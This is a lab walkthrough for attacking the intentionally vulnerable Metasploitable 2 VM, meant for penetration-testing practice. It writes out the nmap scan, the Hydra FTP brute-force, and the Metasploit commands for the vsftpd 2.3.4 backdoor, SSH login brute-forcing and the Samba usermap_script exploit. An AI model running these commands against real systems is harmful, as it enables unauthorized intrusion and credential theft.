Hacking Metasploitable 2 ~ Vulnhub
Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The default login and password is msfadmin:msfadmin. Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).
In my case the metasploitable 2 IP is 192.168.1.6.
Network Scan
The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.
nmap -Pn -sV 192.168.1.6
Exploiting Port 21: FTP
We have all our ports and services listed now, let’s start by Exploiting port 21 running FTP. We will be using Hydra for this. The two wordlists for this operation will have default login names and passwords.
Hydra shows us that we have 3 valid login ID’s and passwords.
hydra -L user.txt -P pass.txt 192.168.1.6 ftp
Let’s put our findings to use and try to connect using FTP.
ftp 192.168.1.6
We get the ftp login
Exploiting VSFTPD 2.3.4
We have exploited the service running on port 21, now we will exploit the particular version of the FTP service. We will be searching for an exploit for VSFTPD 2.3.4.
msf> search vsftpd
We now have our exploit, let’s get into Metasploit and run it.
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.6
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit
Now use the default linux commands to take advantage of the machine .And as you can observe, we have owned the command shell of the remote machine.
Exploiting Port 22 SSH
Metasploit has an auxiliary function that we will use on the SSH service running on port 22. One we get our session through it we will be upgrading it to Meterpreter.
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary (scanner/ssh/ssh_login) > show options
msf auxiliary (scanner/ssh/ssh_login) > set RHOSTS 192.168.1.6
msf auxiliary (scanner/ssh/ssh_login) > set USER_FILE /root/Desktop/users.txt
msf auxiliary (scanner/ssh/ssh_login) > set PASS_FILE /root/Desktop/password.txt
msf auxiliary (scanner/ssh/ssh_login) > exploit
And as you can observe, again we have owned the command shell of the remote machine.
Exploiting Port 139 & 445 (Samba)
Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default port for this exploit is set to port 139 but it can be changed to port 445 as well.
msf > use exploit/multi/samba/usermap_script
msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.6
msf exploit (multi/samba/usermap_script) > exploit
